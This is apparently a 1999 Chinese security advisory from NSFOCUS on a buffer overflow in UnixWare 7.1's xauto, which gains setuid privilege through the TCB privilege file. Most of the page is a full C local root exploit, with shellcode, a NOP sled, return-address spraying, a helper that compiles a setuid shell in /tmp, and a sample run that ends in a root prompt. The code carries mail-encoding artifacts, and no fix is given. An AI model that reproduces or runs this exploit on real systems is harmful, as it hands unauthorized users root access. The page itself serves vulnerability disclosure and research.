首页 -> 安全研究
安全研究
安全漏洞
UnixWare's xauto溢出漏洞
发布日期:1999-12-03
更新日期:1999-12-03
受影响系统:
SCO Unix描述:
+UnixWare 7.1
尽管UnixWare的/usr/X/bin/xauto不是一个suid/sgid程序,它的属性是755、root/sys但仍可以通过缓存溢出来得到root权限。其原因是xauto可以通过/etc/security/tcb/privs来获得
“setuid”权限。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-rwxr-xr-x 1 root sys 39968 Apr 3 1998 /usr/X/bin/xaut
o
bash-2.02$ cat /etc/security/tcb/privs | grep xauto
39968:3056:939894567:%fixed,setuid,dacread:/usr/X/bin/xauto
bash-2.02$ ./uwxauto
UnixWare 7.x exploit for the non-su/gid /usr/X/bin/xauto
Brock Tellier btellier@usa.net
Using offset/addr: 9400/0x8047b08
#
--- uwxauto.c ---
/**
** UnixWare 7.1 root exploit for xauto
** Note that xauto is NOT suid or sgid but gains it''s privs from
** /etc/security/tcb/privs. For more info, consult intro(2) =
** and fileprivs(1)
**
**
** Brock Tellier btellier@usa.net
**/
#include
#include
char scoshell[]=3D /* UnixWare 7.1 shellcode runs /tmp/ui */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define EGGLEN 2048
#define RETLEN 5000
#define ALIGN 0
#define NOP 0x90
#define CODE "void main() { setreuid(0,0); system(\"/bin/sh\"); }\n"
void buildui() {
FILE *fp;
char cc[100];
fp =3D fopen("/tmp/ui.c", "w");
fprintf(fp, CODE);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
system(cc);
}
int main(int argc, char *argv[]) {
long int offset=3D0;
int i;
int egglen =3D EGGLEN;
int retlen;
long int addr;
char egg[EGGLEN];
char ret[RETLEN];
// who needs __asm__? Per Solar Designer''s suggestion
unsigned long sp =3D (unsigned long)&sp;
buildui();
if(argc > 3) {
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
exit(0);
}
else if (argc =3D=3D 2){
offset=3Datoi(argv[1]);
retlen=3DRETLEN;
}
else if (argc =3D=3D 3) {
offset=3Datoi(argv[1]);
retlen=3Datoi(argv[2]);
}
else {
offset=3D9400;
retlen=3D2000;
}
addr=3Dsp + offset;
fprintf(stderr, "UnixWare 7.x exploit for the non-su/gid
/usr/X/bin/xauto\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
fprintf(stderr, "Using offset/addr: %d/0x%x\n", offset,addr);
memset(egg,NOP,egglen);
memcpy(egg+(egglen - strlen(scoshell) - 1),scoshell,strlen(scoshell));
for(i=3DALIGN;i< retlen-4;i+=3D4)
*(int *)&ret[i]=3Daddr;
memcpy(egg, "EGG=3D", 4);
putenv(egg);
execl("/usr/X/bin/xauto", "xauto","-t", ret, NULL);
}
建议:
暂无
浏览次数:7018
严重程度:0(网友投票)
绿盟科技给您安全的保障